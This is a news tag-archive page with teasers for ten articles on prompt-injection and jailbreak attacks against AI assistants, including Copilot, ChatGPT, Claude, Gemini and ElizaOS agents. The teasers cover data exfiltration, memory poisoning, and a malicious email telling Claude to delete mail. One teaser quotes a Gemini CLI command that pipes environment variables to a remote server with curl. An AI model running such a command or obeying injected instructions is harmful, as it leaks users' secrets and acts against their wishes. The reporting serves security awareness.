Tag Archives: prompt injections

A single click mounted a covert, multistage attack against Copilot

Microsoft has fixed a vulnerability in its Copilot AI assistant that allowed hackers to pluck a host of sensitive user data with a single click on a URL. The hackers in this case were white-hat researchers from security firm Varonis. The net effect of their multistage attack was that they exfiltrated data, including the target’s… Read More »

ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues

To block the attack, OpenAI restricted ChatGPT to solely open URLs exactly as provided and refuse to add parameters to them, even when explicitly instructed to do otherwise. With that, ShadowLeak was blocked, since the LLM was unable to construct new URLs by concatenating words or names, appending query parameters, or inserting user-derived data into… Read More »

Syntax hacking: Researchers discover sentence structure can bypass AI safety rules

Researchers from MIT, Northeastern University, and Meta recently released a paper suggesting that large language models (LLMs) similar to those that power ChatGPT may sometimes prioritize sentence structure over meaning when answering questions. The findings reveal a weakness in how these models process instructions that may shed light on why some prompt injection or jailbreaking… Read More »

New attack on ChatGPT research agent pilfers secrets from Gmail inboxes

ShadowLeak starts where most attacks on LLMs do—with an indirect prompt injection. These prompts are tucked inside content such as documents and emails sent by untrusted people. They contain instructions to perform actions the user never asked for, and like a Jedi mind trick, they are tremendously effective in persuading the LLM to do things… Read More »

Claude’s new AI file creation feature ships with deep security risks built in

Independent AI researcher Simon Willison, reviewing the feature today on his blog, noted that Anthropic’s advice to “monitor Claude while using the feature” amounts to “unfairly outsourcing the problem to Anthropic’s users.” Anthropic’s mitigations Anthropic is not completely ignoring the problem, however. The company has implemented several security measures for the file creation feature. For… Read More »

Anthropic’s auto-clicking AI Chrome extension raises browser-hijacking concerns

The company tested 123 cases representing 29 different attack scenarios and found a 23.6 percent attack success rate when browser use operated without safety mitigations. One example involved a malicious email that instructed Claude to delete a user’s emails for “mailbox hygiene” purposes. Without safeguards, Claude followed these instructions and deleted the user’s emails without… Read More »

Flaw in Gemini CLI coding tool could allow hackers to run nasty commands

“At no stage is any subsequent element of the command string after the first ‘grep’ compared to a whitelist,” Cox said. “It just gets free rein to execute off the back of the grep command.” The command line in its entirety was: “grep install README.md; ; env | curl –silent -X POST –data-binary @- http://remote.server:8083… Read More »

New attack can steal cryptocurrency by planting false memories in AI chatbots

The researchers wrote: The implications of this vulnerability are particularly severe given that ElizaOSagents are designed to interact with multiple users simultaneously, relying on shared contextual inputs from all participants. A single successful manipulation by a malicious actor can compromise the integrity of the entire system, creating cascading effects that are both difficult to detect… Read More »

Researchers claim breakthrough in fight against AI’s frustrating security hole

To understand CaMeL, you need to understand that prompt injections happen when AI systems can’t distinguish between legitimate user commands and malicious instructions hidden in content they’re processing. Willison often says that the “original sin” of LLMs is that trusted prompts from the user and untrusted text from emails, webpages, or other sources are concatenated… Read More »

Gemini hackers can deliver more potent attacks with a helping hand from… Gemini

The resulting dataset, which reflected a distribution of attack categories similar to the complete dataset, showed an attack success rate of 65 percent and 82 percent against Gemini 1.5 Flash and Gemini 1.0 Pro, respectively. By comparison, attack baseline success rates were 28 percent and 43 percent. Success rates for ablation, where only effects of… Read More »